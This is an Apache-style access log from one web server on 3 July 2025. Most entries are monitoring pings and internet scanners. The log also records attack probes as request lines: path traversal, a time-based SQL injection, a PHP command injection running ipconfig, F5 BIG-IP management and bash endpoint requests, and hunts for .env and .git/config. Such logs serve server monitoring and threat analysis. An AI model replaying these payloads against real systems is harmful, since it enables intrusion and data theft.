77.90.153.48 - - [03/Jul/2025:14:27:37 +0200] "POST /arrow.flight.protocol.FlightService/DoPut HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:14:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:14:28:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:14:28:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:14:29:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
160.30.44.120 - - [03/Jul/2025:14:29:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:14:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:31:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.196.152.35 - - [03/Jul/2025:14:31:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
212.91.247.32 - - [03/Jul/2025:14:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET /odinhttpcall1751545643 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
167.172.187.198 - - [03/Jul/2025:14:35:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.232.121.101 - - [03/Jul/2025:14:35:06 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
167.99.251.122 - - [03/Jul/2025:14:35:06 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
64.226.67.151 - - [03/Jul/2025:14:35:06 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
206.81.29.108 - - [03/Jul/2025:14:35:06 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
159.89.16.251 - - [03/Jul/2025:14:35:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.121.101 - - [03/Jul/2025:14:35:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.112.141 - - [03/Jul/2025:14:35:06 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
165.232.121.101 - - [03/Jul/2025:14:35:06 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
159.89.16.251 - - [03/Jul/2025:14:35:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.61.43 - - [03/Jul/2025:14:35:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:14:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [03/Jul/2025:14:36:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
87.236.176.137 - - [03/Jul/2025:14:36:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.247.32 - - [03/Jul/2025:14:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:14:37:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:14:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.106.11.6 - - [03/Jul/2025:14:38:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
141.98.10.162 - - [03/Jul/2025:14:38:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:14:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:14:40:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:14:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [03/Jul/2025:14:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:14:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [03/Jul/2025:14:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:14:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.59.143.102 - - [03/Jul/2025:14:44:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
139.59.143.102 - - [03/Jul/2025:14:44:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800062) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /@vite/env HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /actuator/env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /server HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
f1096f7e4e.scan.leakix.org - - [03/Jul/2025:14:44:33 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:33 +0200] "GET /_all_dbs HTTP/1.1" 404 313 "-" "Mozilla/5.0 (l9scan/2.0.4383e2634323e21393e2231323; +https://leakix.net)"
139.59.143.102 - - [03/Jul/2025:14:44:34 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:34 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:34 +0200] "GET /s/4383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:37 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:37 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:37 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
139.59.143.102 - - [03/Jul/2025:14:44:37 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:14:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.130.177 - - [03/Jul/2025:14:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
138.68.130.177 - - [03/Jul/2025:14:45:06 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:14:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.135.115.233 - - [03/Jul/2025:14:49:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:14:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.207.124 - - [03/Jul/2025:14:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.207.124 - - [03/Jul/2025:14:49:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.32.207.124 - - [03/Jul/2025:14:49:56 +0200] "t3 12.1.2" 400 329 "-" "-"
152.32.235.160 - - [03/Jul/2025:14:50:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0) AppleWebKit/581.41 (KHTML, like Gecko) Chrome/80.0.625 Safari/537.36"
152.32.235.160 - - [03/Jul/2025:14:50:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
152.32.235.160 - - [03/Jul/2025:14:50:34 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
152.32.235.160 - - [03/Jul/2025:14:50:34 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:14:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.22.221.223 - - [03/Jul/2025:14:53:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
212.91.247.32 - - [03/Jul/2025:14:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.132.244 - - [03/Jul/2025:14:56:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.132.244 - - [03/Jul/2025:14:56:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.132.244 - - [03/Jul/2025:14:56:30 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
165.22.132.244 - - [03/Jul/2025:14:56:30 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
165.22.132.244 - - [03/Jul/2025:14:56:31 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:14:56:31 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:14:56:32 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:14:56:32 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.132.244 - - [03/Jul/2025:14:56:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.22.132.244 - - [03/Jul/2025:14:56:32 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
165.22.132.244 - - [03/Jul/2025:14:56:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:14:56:33 +0200] "POST /userentry?accountId=/../../../tomcat/webapps/5IIde/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1"
171.22.16.88 - - [03/Jul/2025:14:56:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
77.90.153.48 - - [03/Jul/2025:14:56:45 +0200] "POST /userentry?accountId=/../../../tomcat/webapps/5IIde/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1"
212.91.247.32 - - [03/Jul/2025:14:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.10.162 - - [03/Jul/2025:14:57:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.153.48 - - [03/Jul/2025:14:57:06 +0200] "GET /5IIde/CVE-2023-47246.txt?true HTTP/1.1" 404 329 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
31.56.241.177 - - [03/Jul/2025:14:57:26 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
31.56.241.177 - - [03/Jul/2025:14:57:26 +0200] "GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1" 404 324 "-" "Go-http-client/1.1"
212.91.247.32 - - [03/Jul/2025:14:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:14:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.51.38.193 - - [03/Jul/2025:15:01:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:15:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.152.219.130 - - [03/Jul/2025:15:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.247.32 - - [03/Jul/2025:15:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.153.71.12 - - [03/Jul/2025:15:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [03/Jul/2025:15:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.177 - - [03/Jul/2025:15:08:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.177 - - [03/Jul/2025:15:08:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.177 - - [03/Jul/2025:15:08:15 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
24.144.87.77 - - [03/Jul/2025:15:08:22 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
24.144.87.77 - - [03/Jul/2025:15:08:23 +0200] "GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1" 404 324 "-" "Go-http-client/1.1"
167.94.138.177 - - [03/Jul/2025:15:08:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.177 - - [03/Jul/2025:15:08:39 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.177 - - [03/Jul/2025:15:08:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.138.177 - - [03/Jul/2025:15:08:50 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [03/Jul/2025:15:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
24.144.87.77 - - [03/Jul/2025:15:08:57 +0200] "\x16\x03\x01\x05\xa8\x01" 501 321 "-" "-"
24.144.87.77 - - [03/Jul/2025:15:08:57 +0200] "GET /locales/locale.json?locale=../../config/&namespace=database HTTP/1.1" 404 324 "-" "Go-http-client/1.1"
77.90.153.48 - - [03/Jul/2025:15:09:31 +0200] "POST /tmui/login.jsp HTTP/1.1" 404 319 "-" "-"
77.90.153.48 - - [03/Jul/2025:15:09:31 +0200] "204" 501 318 "-" "-"
212.91.247.32 - - [03/Jul/2025:15:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:15:10:04 +0200] "PATCH /mgmt/tm/auth/user/gM6Jw HTTP/1.1" 405 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
77.90.153.48 - - [03/Jul/2025:15:10:07 +0200] "POST /mgmt/shared/authn/login HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
77.90.153.48 - - [03/Jul/2025:15:10:10 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
77.90.153.48 - - [03/Jul/2025:15:10:13 +0200] "PATCH /mgmt/tm/auth/user/gM6Jw HTTP/1.1" 405 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
77.90.153.48 - - [03/Jul/2025:15:10:15 +0200] "POST /mgmt/shared/authn/login HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0"
77.90.153.48 - - [03/Jul/2025:15:10:17 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
212.91.247.32 - - [03/Jul/2025:15:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:15:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [03/Jul/2025:15:19:02 +0200] "GET /dview8/api/usersByLevel HTTP/1.1" 404 328 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:15:19:03 +0200] "GET /tutor/filter?searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:15:19:03 +0200] "POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363"
77.90.153.48 - - [03/Jul/2025:15:19:04 +0200] "GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1" 404 354 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Jul/2025:15:19:11 +0200] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/102.0 Safari/537.36"
